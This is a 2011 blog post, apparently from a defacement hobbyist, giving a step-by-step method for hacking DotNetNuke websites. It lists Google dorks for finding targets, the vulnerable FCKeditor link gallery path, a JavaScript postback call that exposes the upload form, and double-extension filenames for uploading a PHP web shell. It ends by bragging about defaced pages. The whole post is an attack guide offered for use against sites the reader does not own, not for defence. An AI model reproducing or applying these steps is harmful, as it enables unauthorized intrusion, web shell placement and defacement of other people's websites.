Thursday 4 August 2011

Web Defacing - DNN (Dot Net Nuke)


DNN Hacking Method

  • Find A DNN (Dot Net Nuke) Vulnerable Sites By Google Dorks:
  1. inurl:/tabid/36/language/en-US/Default.aspx
  2. inurl:"/portals/0/"
  3. inurl:tabid/176/Default.aspx
Searh One Of Them In Google,
  • Select the site which you are comfortable with. Its like  http://www.A4Apple.com/Home/tabid/36/Language/en-US/Default.aspx
     OR
     www.B4Ball.com/portals/0/


  • Now replace this /Home/tabid/36/Language/en-US/Default.aspx or Portals/0/ with this /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  • So Its Looks Like This www.B4Ball.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  • If Its Look Like This Then Its Vulnerable And It Can Be Hack http://i52.tinypic.com/ifo76e.png
  • Now click on the file ( A File On Your Site ) .
  • copy the script which is in Dark colour below JavaScript:__doPostBack('ctlURL$cmdUpload','')
     and paste it into the browser be sure we must use firefox for this hack.
  • It Will Like This http://i52.tinypic.com/jh3khu.png
  • Now browse your shell or a File and click on upload selected file , it does not allows the .php extensions  so change the name of shell  as shellname.php.jpg orshellname.php..jpg (Some time changing of extension is not work to execute the shell maximum try to upload with the extension php )
Your upload file link is like this http://www.A4Apple.com/portals/0/uploadshellname.php.jpg




Web pages Defaced My me

Gray Hat Hacking The Ethical Hackers Handbook, 3rd EditionSoftware Development Books)






Thats It Guys!!









2 comments: